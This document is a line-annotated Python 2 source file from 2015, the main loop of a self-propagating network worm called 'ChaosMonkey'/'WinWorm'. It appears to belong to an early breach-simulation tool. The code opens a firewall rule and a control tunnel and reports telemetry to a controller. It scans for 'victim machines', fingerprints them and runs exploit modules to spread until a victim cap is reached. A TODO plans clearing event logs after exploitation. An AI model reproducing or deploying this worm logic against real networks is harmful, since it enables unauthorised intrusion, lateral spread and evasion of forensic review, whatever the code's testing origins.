2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
import sys
|
|
|
|
import time
|
|
|
|
import logging
|
2015-09-29 22:58:06 +08:00
|
|
|
import platform
|
2015-08-30 15:27:35 +08:00
|
|
|
from system_singleton import SystemSingleton
|
2015-10-08 18:39:52 +08:00
|
|
|
from network.firewall import app as firewall
|
2015-08-30 15:27:35 +08:00
|
|
|
from control import ControlClient
|
2015-09-29 22:58:06 +08:00
|
|
|
from config import WormConfiguration, EXTERNAL_CONFIG_FILE
|
2015-08-30 15:27:35 +08:00
|
|
|
from network.network_scanner import NetworkScanner
|
2015-10-08 18:39:52 +08:00
|
|
|
import tunnel
|
2015-09-29 22:58:06 +08:00
|
|
|
import getopt
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
__author__ = 'itamar'
|
|
|
|
|
|
|
|
LOG = logging.getLogger(__name__)
|
|
|
|
|
|
|
|
# TODO:
|
|
|
|
# 1. Remote dating of copied file
|
|
|
|
# 2. OS Detection prior to exploit
|
|
|
|
# 3. Exploit using token credentials
|
|
|
|
# 4. OS Support for exploitation modules (win / linux specific)
|
|
|
|
# 5. Linux portability
|
|
|
|
# 6. Clear eventlog after exploitation
|
|
|
|
# 7. Add colors to logger
|
|
|
|
|
|
|
|
class ChaosMonkey(object):
|
|
|
|
def __init__(self, args):
|
|
|
|
self._keep_running = False
|
|
|
|
self._exploited_machines = set()
|
|
|
|
self._fail_exploitation_machines = set()
|
|
|
|
self._singleton = SystemSingleton()
|
2015-09-29 22:58:06 +08:00
|
|
|
self._parent = None
|
|
|
|
self._args = args
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
def initialize(self):
|
|
|
|
LOG.info("WinWorm is initializing...")
|
|
|
|
|
|
|
|
if not self._singleton.try_lock():
|
|
|
|
raise Exception("Another instance of the monkey is already running")
|
|
|
|
|
2015-09-29 22:58:06 +08:00
|
|
|
opts, self._args = getopt.getopt(self._args, "p:", ["parent="])
|
|
|
|
for op, val in opts:
|
|
|
|
if op in ("-p", "--parent"):
|
|
|
|
self._parent = val
|
|
|
|
break
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
self._keep_running = True
|
2015-09-29 22:58:06 +08:00
|
|
|
self._network = NetworkScanner()
|
2015-08-30 15:27:35 +08:00
|
|
|
self._dropper_path = sys.argv[0]
|
|
|
|
|
|
|
|
|
|
|
|
def start(self):
|
|
|
|
LOG.info("WinWorm is running...")
|
|
|
|
|
2015-10-08 18:39:52 +08:00
|
|
|
if firewall.is_enabled():
|
|
|
|
firewall.add_firewall_rule()
|
|
|
|
|
|
|
|
ControlClient.wakeup(self._parent)
|
|
|
|
|
|
|
|
monkey_tunnel = ControlClient.create_control_tunnel()
|
|
|
|
if monkey_tunnel:
|
|
|
|
monkey_tunnel.start()
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
for _ in xrange(WormConfiguration.max_iterations):
|
2015-09-29 22:58:06 +08:00
|
|
|
ControlClient.keepalive()
|
|
|
|
ControlClient.load_control_config()
|
|
|
|
|
|
|
|
self._network.initialize()
|
|
|
|
|
|
|
|
self._exploiters = [exploiter() for exploiter in WormConfiguration.exploiter_classes]
|
2015-08-30 15:27:35 +08:00
|
|
|
|
2015-09-29 22:58:06 +08:00
|
|
|
self._fingerprint = [fingerprint() for fingerprint in WormConfiguration.finger_classes]
|
|
|
|
|
|
|
|
if not self._keep_running or not WormConfiguration.alive:
|
2015-08-30 15:27:35 +08:00
|
|
|
break
|
|
|
|
|
|
|
|
machines = self._network.get_victim_machines(WormConfiguration.scanner_class,
|
|
|
|
max_find=WormConfiguration.victims_max_find)
|
|
|
|
|
|
|
|
for machine in machines:
|
2015-09-29 22:58:06 +08:00
|
|
|
for finger in self._fingerprint:
|
|
|
|
LOG.info("Trying to get OS fingerprint from %r with module %s",
|
|
|
|
machine, finger.__class__.__name__)
|
|
|
|
finger.get_host_fingerprint(machine)
|
|
|
|
|
|
|
|
ControlClient.send_telemetry('scan', {'machine': machine.as_dict(),
|
|
|
|
'scanner' : WormConfiguration.scanner_class.__name__})
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
# skip machines that we've already exploited
|
|
|
|
if machine in self._exploited_machines:
|
|
|
|
LOG.debug("Skipping %r - already exploited",
|
|
|
|
machine)
|
|
|
|
continue
|
|
|
|
elif machine in self._fail_exploitation_machines:
|
|
|
|
LOG.debug("Skipping %r - exploitation failed before",
|
|
|
|
machine)
|
|
|
|
continue
|
|
|
|
|
|
|
|
successful_exploiter = None
|
|
|
|
for exploiter in self._exploiters:
|
2015-09-29 22:58:06 +08:00
|
|
|
if not exploiter.is_os_supported(machine):
|
|
|
|
LOG.info("Skipping exploiter %s host:%r, os is not supported",
|
|
|
|
exploiter.__class__.__name__, machine)
|
|
|
|
continue
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
LOG.info("Trying to exploit %r with exploiter %s...",
|
|
|
|
machine, exploiter.__class__.__name__)
|
|
|
|
|
|
|
|
try:
|
2015-09-29 22:58:06 +08:00
|
|
|
if exploiter.exploit_host(machine):
|
2015-08-30 15:27:35 +08:00
|
|
|
successful_exploiter = exploiter
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
LOG.info("Failed exploiting %r with exploiter %s",
|
|
|
|
machine, exploiter.__class__.__name__)
|
|
|
|
except Exception, exc:
|
|
|
|
LOG.error("Exception while attacking %s using %s: %s",
|
|
|
|
machine, exploiter.__class__.__name__, exc)
|
|
|
|
continue
|
|
|
|
|
|
|
|
if successful_exploiter:
|
|
|
|
self._exploited_machines.add(machine)
|
2015-09-29 22:58:06 +08:00
|
|
|
ControlClient.send_telemetry('exploit', {'machine': machine.__dict__,
|
|
|
|
'exploiter': successful_exploiter.__class__.__name__})
|
2015-08-30 15:27:35 +08:00
|
|
|
|
|
|
|
LOG.info("Successfully propagated to %s using %s",
|
|
|
|
machine, successful_exploiter.__class__.__name__)
|
|
|
|
|
|
|
|
# check if max-exploitation limit is reached
|
|
|
|
if WormConfiguration.victims_max_exploit <= len(self._exploited_machines):
|
|
|
|
self._keep_running = False
|
|
|
|
|
|
|
|
LOG.info("Max exploited victims reached (%d)", WormConfiguration.victims_max_exploit)
|
|
|
|
break
|
|
|
|
else:
|
|
|
|
self._fail_exploitation_machines.add(machine)
|
|
|
|
|
2015-09-29 22:58:06 +08:00
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
time.sleep(WormConfiguration.timeout_between_iterations)
|
|
|
|
|
|
|
|
if self._keep_running:
|
|
|
|
LOG.info("Reached max iterations (%d)", WormConfiguration.max_iterations)
|
|
|
|
|
2015-10-08 18:39:52 +08:00
|
|
|
if monkey_tunnel:
|
|
|
|
monkey_tunnel.stop()
|
|
|
|
monkey_tunnel.join()
|
|
|
|
|
2015-08-30 15:27:35 +08:00
|
|
|
def cleanup(self):
|
|
|
|
self._keep_running = False
|
|
|
|
|
|
|
|
self._singleton.unlock()
|
2015-10-08 18:39:52 +08:00
|
|
|
|
|
|
|
tunnel_address = ControlClient.proxies.get('https', '').replace('https://', '').split(':')[0]
|
|
|
|
if tunnel_address:
|
|
|
|
LOG.info("Quitting tunnel %s", tunnel_address)
|
|
|
|
tunnel.quit_tunnel(tunnel_address)
|
|
|
|
|
|
|
|
firewall.close()
|